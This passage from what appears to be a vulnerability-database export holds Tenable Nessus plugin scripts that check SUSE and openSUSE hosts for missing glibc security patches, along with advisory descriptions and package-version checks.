value:\"p-cpe:/a:novell:suse_linux:11:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", 
reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i686\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-devel-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-html-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-i18ndata-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-info-2.11.3-17.80.3\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-locale-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"glibc-profile-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"nscd-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.80.3\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.80.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix a security issue and two bugs :\n\nSecurity issue fixed :\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043)\n\nBugs fixed :\n\n - don", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0167-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83674", "published": "2015-05-20T00:00:00", "title": "SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0167-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0167-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83674);\n script_version(\"2.7\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-4043\", \"CVE-2014-6040\");\n script_bugtraq_id(68006, 69470, 69472);\n\n script_name(english:\"SUSE SLES11 Security Update : glibc (SUSE-SU-2015:0167-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix a security issue and two bugs :\n\nSecurity issue fixed :\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043)\n\nBugs fixed :\n\n - don't touch user-controlled stdio locks in forked child\n (bsc#864081, GLIBC BZ #12847)\n\n - Fix infinite loop in check_pf (bsc#909053, GLIBC BZ\n #12926)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=864081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=909053\"\n );\n # https://download.suse.com/patch/finder/?keywords=880eb49b49e66cc28d6f1daf5ce1ccae\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fa3fbe5e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150167-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c2d945b6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11 SP2 LTSS :\n\nzypper in -t patch slessp2-glibc-10220\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-devel-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-html-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-i18ndata-2.11.3-17.45.57.6\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-info-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-locale-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"glibc-profile-2.11.3-17.45.57.6\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"nscd-2.11.3-17.45.57.6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:00:42", "bulletinFamily": "scanner", "description": "glibc was updated to fix three security issues :\n\n - A directory traversal in locale environment handling was\n fixed (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could\n be used for code execution (CVE-2014-5119, bnc#892073,\n GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, bnc#894553, BZ #17325)", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2014-536.NASL", "href": "https://www.tenable.com/plugins/nessus/77659", "published": "2014-09-12T00:00:00", "title": "openSUSE Security Update : glibc (openSUSE-SU-2014:1115-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-536.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77659);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(68505, 68983, 69472);\n\n 
script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2014:1115-1)\");\n script_summary(english:\"Check for the openSUSE-2014-536 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc was updated to fix three security issues :\n\n - A directory traversal in locale environment handling was\n fixed (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could\n be used for code execution (CVE-2014-5119, bnc#892073,\n GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, bnc#894553, BZ #17325)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=887022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00017.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debugsource-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-static-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-html-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-i18ndata-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-info-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", 
reference:\"glibc-locale-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-profile-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debugsource-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.17-4.13.1\") 
) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debugsource-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-static-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-html-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-i18ndata-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-info-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-profile-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debugsource-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", 
